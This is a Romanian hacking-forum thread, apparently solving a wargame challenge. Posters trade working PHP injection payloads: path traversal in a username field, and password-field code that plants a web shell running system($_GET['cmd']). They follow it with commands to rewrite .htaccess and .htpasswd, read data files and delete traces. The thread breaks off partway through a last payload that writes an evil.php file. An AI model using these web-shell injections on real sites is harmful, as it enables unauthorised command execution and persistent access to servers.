![]() |
|
|
#1 (permalink) |
Registered Users
Bautor de whiskey
|
|
|
| Sponsored Links |
|
|
#2 (permalink) |
Registered Users
Cultul betivilor
|
le: nu am citit toata cerinta ta, eu am scris daca aveam deja fisierul respectiv in root folder.
le 2 : cred ca asta-i rezolvarea: username: ../pax password: echo system($_GET['sef']); ---------------------------------------- cd /users; ls; cat sirgod_data.php sau daca avem htpasswd cd /users; echo "pax:$apr1$du8Pz...$RJyRugqxByqFpW7Rk2RQS/" > .htpasswd sau daca nu avem cd /users; rm .htaccess; touch .htaccess; echo "order deny, allow deny from all allow from 89.177.11.*" > .htaccess
|
|
#4 (permalink) |
Registered Users
Bautor de whiskey
|
@loki: Gresit. Iti va creea fisierul in folderul users, pe care nu il poti accesa pentru ca ai .htaccess, deci nu ai ce face cu el.
@pax: Ai prins ideea, dar vezi ca ce injectezi tu nu merge. O sa iti dea o eroare cand accesezi fisierul: Code:
Parse error: parse error, expecting `T_STRING' or `T_VARIABLE' or `T_NUM_STRING' in C:\wamp\www\wargames\pax_data.php on line 1 Sa explic pe scurt: Nu aveti acces la site decat prin WWW. Nu aveti consola. Nu puteti face NIMIC ca sa accesati folderul users pentru ca nu puteti trece peste htaccess. Si inca ceva, de care nu ati tinut cont. Am zis sa creati un fisier cu numele vostru nu numelevostru_data.php . Nu e mare branza, doar o mica schimbare de cod care trebuie injectat.
|
#5 (permalink) |
Bad coder
Cultul betivilor
|
Windows httpd server..
1. Creem un shell langa directorul users, numit shell_data.php Username>> ../shell Password>> "; ?><?php system($_GET['cmd']); // 2. shell_data.php?cmd=echo "<?php system($_GET['cmd']); ?>" > fitty.php 3. fitty.php?cmd=del shell_data.php 4. fitty.php?cmd=dir >> Avem shell-ul fitty.php << Pa.
| Last edited by Fitty; 02-07-2010 at 08:54 PM. | |
|
|
#6 (permalink) |
Registered Users
Bautor de whiskey
|
Eh, merge si asa, dar merge si decat cu injectare o singura data, ceva de genu:
User: ../ Pass: Code:
"?><?php
$code = "evil.php";
$handler = fopen($code, 'w') or die("cant open file");